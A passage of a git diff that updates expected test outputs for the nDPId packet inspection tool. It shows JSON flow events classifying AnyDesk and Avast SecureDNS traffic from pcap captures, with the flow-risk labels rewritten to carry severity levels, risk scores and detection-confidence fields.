Session"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}}
+01293{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1613977595407,"flow_last_seen":1613977595964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1286,"flow_tot_l4_payload_len":3316,"flow_avg_l4_payload_len":221,"midstream":0,"ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.187","src_port":52039,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}}
+01195{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2064,"flow_first_seen":1613977595379,"flow_last_seen":1613977618224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":223587,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1613977618224,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}}
 00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2521,"source":"anydesk-2.pcap","alias":"nDPId-test","total-events-serialized":904}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2521/2083
@@ -910,9 +910,9 @@
 ~~ total active/idle flows...: 4/4
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4671214 bytes
-~~ total memory freed........: 4671214 bytes
-~~ total allocations/frees...: 101651/101651
+~~ total memory allocated....: 4755183 bytes
+~~ total memory freed........: 4755183 bytes
+~~ total allocations/frees...: 103241/103241
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
 ~~ json string max len.......: 7845 chars
diff --git a/test/results/anydesk.pcap.out b/test/results/anydesk.pcap.out
index 6965294a6..3a47e34eb 100644
--- a/test/results/anydesk.pcap.out
+++ b/test/results/anydesk.pcap.out
@@ -7,12 +7,12 @@
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1591342199201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1591342199201,"pkt":"AFBW5dKtAAwplUdeCABFAAA8CJBAAEAGudPAqJWBM1Pu26oPAFApppzyAAAAAKAC+vB4hwAAAgQFtAQCCAqukMx3AAAAAAEDAwc="}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1591342199366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1591342199366,"pkt":"AAwplUdeAFBW5dKtCABFAAAse1UAAIAGRx4zU+7bwKiVgQBQqg9odWR8Kaac82AS+vDm4QAAAgQFtAAA"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1591342199366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1591342199366,"pkt":"AFBW5dKtAAwplUdeCABFAAAoCJFAAEAGuebAqJWBM1Pu26oPAFApppzzaHVkfVAQ+vB4cwAA"}
-00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1591342199201,"flow_last_seen":1591342199366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1591342199366,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing","30":"Desktop\/File Sharing Session"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1563,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing","30":"Desktop\/File Sharing Session"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}}
-01222{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2863,"flow_avg_l4_payload_len":357,"midstream":0,"ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing","30":"Desktop\/File Sharing Session"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=AnyNet Root CA, O=philandro Software GmbH, C=DE","subjectDN":"C=DE, O=philandro Software GmbH, CN=AnyNet Relay","fingerprint":"9E:08:D2:58:A9:02:CD:4F:E2:4A:26:B8:48:5C:43:0B:81:29:99:E3"}}
-00687{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"30":"Desktop\/File Sharing Session"},"proto":"HTTP.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"http": {}}
+01311{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1591342199201,"flow_last_seen":1591342199366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1591342199366,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01370{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1563,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}}
+01573{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2863,"flow_avg_l4_payload_len":357,"midstream":0,"ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=AnyNet Root CA, O=philandro Software GmbH, C=DE","subjectDN":"C=DE, O=philandro Software GmbH, CN=AnyNet Relay","fingerprint":"9E:08:D2:58:A9:02:CD:4F:E2:4A:26:B8:48:5C:43:0B:81:29:99:E3"}}
+00803{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"2":"Match by IP"},"proto":"HTTP.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"http": {}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6943,"flow_first_seen":1591342199201,"flow_last_seen":1591342255171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2417415,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing","30":"Desktop\/File Sharing Session"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}}
+01194{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6943,"flow_first_seen":1591342199201,"flow_last_seen":1591342255171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2417415,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","total-events-serialized":16}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 6963/6963
@@ -22,10 +22,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4804661 bytes
-~~ total memory freed........: 4804661 bytes
-~~ total allocations/frees...: 106524/106524
+~~ total memory allocated....: 4889286 bytes
+~~ total memory freed........: 4889286 bytes
+~~ total allocations/frees...: 108114/108114
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
-~~ json string max len.......: 1227 chars
-~~ json string avg len.......: 759 chars
+~~ json string max len.......: 1578 chars
+~~ json string avg len.......: 933 chars
diff --git a/test/results/avast_securedns.pcapng.out b/test/results/avast_securedns.pcapng.out
index f072a807a..3c19d632c 100644
--- a/test/results/avast_securedns.pcapng.out
+++ b/test/results/avast_securedns.pcapng.out
@@ -1,200 +1,200 @@
 00449{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"avast_securedns.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625215624443,"flow_last_seen":1625215624443,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625215624443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625215624443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625215624443,"pkt":"eJS0JASgYDjgxTWgCABFAABDZa4AAH8ROYTAqAJktdYjleJyAbsAL0mrSMQBAAABAAAAAAAAATIJU2VDVVJlZG5TBWFWYXNUA0NvTQAAEAAB"}
-00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625215624443,"flow_last_seen":1625215624443,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625215624443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625215624443,"flow_last_seen":1625215624443,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625215624443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1625215624563,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625215624563,"pkt":"YDjgxTWgeJS0JASgCABFAADM0kQAADIRGWW11iOVwKgCZAG74nIAuMIZSMSBgAABAAEAAAAAATIJU2VDVVJlZG5TBWFWYXNUA0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625215624443,"flow_last_seen":1625215624563,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625241699450,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625215624443,"flow_last_seen":1625215624563,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625241699450,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241699450,"flow_last_seen":1625241699450,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625241699450,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1625241699450,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625241699450,"pkt":"eJS0JASgYDjgxTWgCABFAABDEeYAAH8RjUzAqAJktdYjle8RAbsAL9I803MBAAABAAAAAAAAATIJU0VjdVJlRE5zBUF2YXNUA0NPbQAAEAAB"}
-00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241699450,"flow_last_seen":1625241699450,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625241699450,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
